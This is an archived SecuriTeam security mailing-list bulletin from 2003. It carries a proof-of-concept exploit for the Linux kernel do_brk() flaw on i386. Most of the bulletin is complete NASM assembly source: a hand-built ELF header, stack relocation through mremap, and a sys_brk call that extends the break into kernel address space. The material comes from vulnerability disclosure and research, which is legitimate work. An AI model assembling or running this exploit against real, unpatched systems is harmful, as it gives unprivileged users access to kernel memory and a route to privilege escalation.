[EXPL] Linux Kernel Do_brk(), Another Proof-of-Concept Code For I386
From: SecuriTeam (support_at_securiteam.com)
Date: 12/07/03
- Previous message: SecuriTeam: "[UNIX] Linux Kernel do_brk() Vulnerablility (Explained)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 7 Dec 2003 10:39:39 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Linux Kernel Do_brk(), Another Proof-of-Concept Code For I386
------------------------------------------------------------------------
SUMMARY
The previous version of the
<http://www.securiteam.com/exploits/6A0000U96C.html> exploit was relying
on the Linux ELF loader to call do_brk for us. This one uses sys_brk(),
but to bypass a check of available memory in sys_brk we still have to map
our code high in memory (but not past PAGE_OFFSET this time).
To be able to call sys_brk successfully we need to make sure that the
stack isn't above our program (in most cases we have to move it).
DETAILS
Exploit:
; Use NASM 0.98.38 or higher to compile.
; Christophe Devine (devine at cr0.net) and Julien Tinnes (julien at
cr0.org)
;
; This exploit uses sys_brk directly to expand his break and doesn't rely
; on the ELF loader to do it.
;
; To bypass a check in sys_brk against available memory, we use a high
; virtual address as base address
;
; In most case (let's say when no PaX w/ ASLR :) we have to move the stack
; so that we can expand our break
;
BITS 32
org 0xBFFF0000
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 1, 1 ; e_ident
times 9 db 0
dw 2 ; e_type
dw 3 ; e_machine
dd 1 ; e_version
dd _start ; e_entry
dd phdr - $$ ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 2 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type
dd 0 ; p_offset
dd $$ ; p_vaddr
dd $$ ; p_paddr
dd filesize ; p_filesz
dd filesize ; p_memsz
dd 7 ; p_flags
dd 0x1000 ; p_align
phdrsize equ $ - phdr
_start:
; ** Make sure the stack is not above us
mov eax, 163 ; mremap
mov ebx, esp
and ebx, ~(0x1000 - 1) ; align to page size
mov ecx, 0x1000 ; we suppose stack is one page only
mov edx, 0x9000 ; be sure it can't get mapped after
; us
mov esi,1 ; MREMAP_MAYMOVE
int 0x80
and esp, (0x1000 - 1) ; offset in page
add esp, eax ; stack ptr to new location
; nb: we don't fix
; pointers so environ/cmdline
; are not available
mov eax,152 ; mlockall (for tests as root)
mov ebx,2 ; MCL_FUTURE
int 0x80
; get VMAs for the kernel memory
mov eax,45 ; brk
mov ebx,0xC0500000
int 0x80
mov ecx, 4
loop0:
mov eax, 2 ; fork
int 0x80
loop loop0
_idle:
mov eax,162 ; nanosleep
mov ebx,timespec
int 0x80
jmp _idle
timespec dd 10,0
filesize equ $ - $$
ADDITIONAL INFORMATION
The information has been provided by <mailto:julien at cr0.org> Julien
TINNES
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] Linux Kernel do_brk() Vulnerablility (Explained)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [NT] Defeating Microsoft Windows XP SP2 Heap Protection and DEP Bypass
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... and bypassing DEP (Data Execution
Prevention). ... Buffer overrun attacks are among the most common mechanisms, or vectors,
... a long string to an input stream or control longer than the memory ... (Securiteam) - [NEWS] Buffer Overflow in Mozilla Browser Firefox (Heap Corruption)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... corruption in the Mozilla browser
as well as in Mozilla Firefox, ... The vulnerability specifically exists in string handling
functions, ... pointing at a known memory location. ... (Securiteam) - [UNIX] Userland Can Access Linux Kernel Memory (do_brk() Argument Bound Checking)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Critical security bug has been
discovered in the Linux kernel within ... The physical memory of a x86 machine running
one of the recent Linux ... kernel) on all vulnerable systems. ... (Securiteam) - [TOOL] Valgrind, an Open-Source Memory Debugger for x86-GNU/Linux
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... reads and writes of memory
are checked, ... As a result, Valgrind can detect ... Valgrind contains built-in
support for doing very detailed cache ... (Securiteam) - [NT] Microsoft Agent Heap Overflow Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Agent Heap Overflow
Vulnerability ... The .acf format when uncompressed in memory, ... when creating
the .acf file). ... (Securiteam)
